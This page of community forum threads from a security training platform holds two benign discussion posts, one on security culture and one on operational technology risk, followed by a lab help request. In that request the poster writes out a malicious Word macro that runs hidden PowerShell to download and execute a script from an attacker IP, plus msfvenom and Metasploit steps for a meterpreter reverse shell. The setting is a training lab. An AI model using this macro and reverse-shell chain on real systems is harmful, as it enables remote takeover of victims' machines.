Phishing != Security Awareness
Dear IL Community, I wanted to express some thoughts about the challenge that organizations may face if they want to establish a cybersecurity culture, especially when individuals within an organizationdo not prioritize or care about cybersecurity. From my perspective, one of the main reasons it's tough to get a cybersecurity culture going is that people just don't see the potential consequences of cyber threats. They often don't realize how much of an impact a security breach can have or how important it is for them to protect sensitive information. This lack of interest can create a big vulnerability in an organization's security defenses. Would love to get your view and discuss the following things: How can we make cybersecurity feel relevant to every employee? What innovative approaches have you seen in creating a security-minded culture? Are current training methods truly effective, or do we need a radical rethink? Is it about the missing Leadership commitment? Do we struggle to demonstrate the tangible business impacts of cybersecurity? It would be very appreciated if you can share your thoughts and experiences! All the best - Nermin
Operational Technology a Concern?
"Hey Immersive Labs community, I'm curious about your experiences with Operational Technology (OT) in your organizations. With the increasing convergence of IT and OT across healthcare, education, and various industries, I'm seeing more medical devices, building automation systems, and industrial control systems becoming part of our daily operations. A few questions for the community: How are you currently handling OT security challenges in your environment? What knowledge gaps do you see in your teams when it comes to securing OT systems? For those in healthcare or campus environments - what specific OT challenges keep you up at night? What skills do you wish your teams had to better manage OT security? I believe this is becoming increasingly important as more connected devices and control systems enter our networks. Would love to hear your thoughts and experiences - both challenges and successes. Looking forward to learning from everyone's perspectives!"
Weaponization: Payloads – Office Macros
I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes. 1. I've created a macro enabled word doc with the following vb code on windows machine: Sub Document_Open() Dim ps as String ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')" process = Shell(ps, vbhide) End Sub 2. python3 -m http.server to start server to serve shell.ps1 on request 3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for 4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener 5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute. What am I missing?
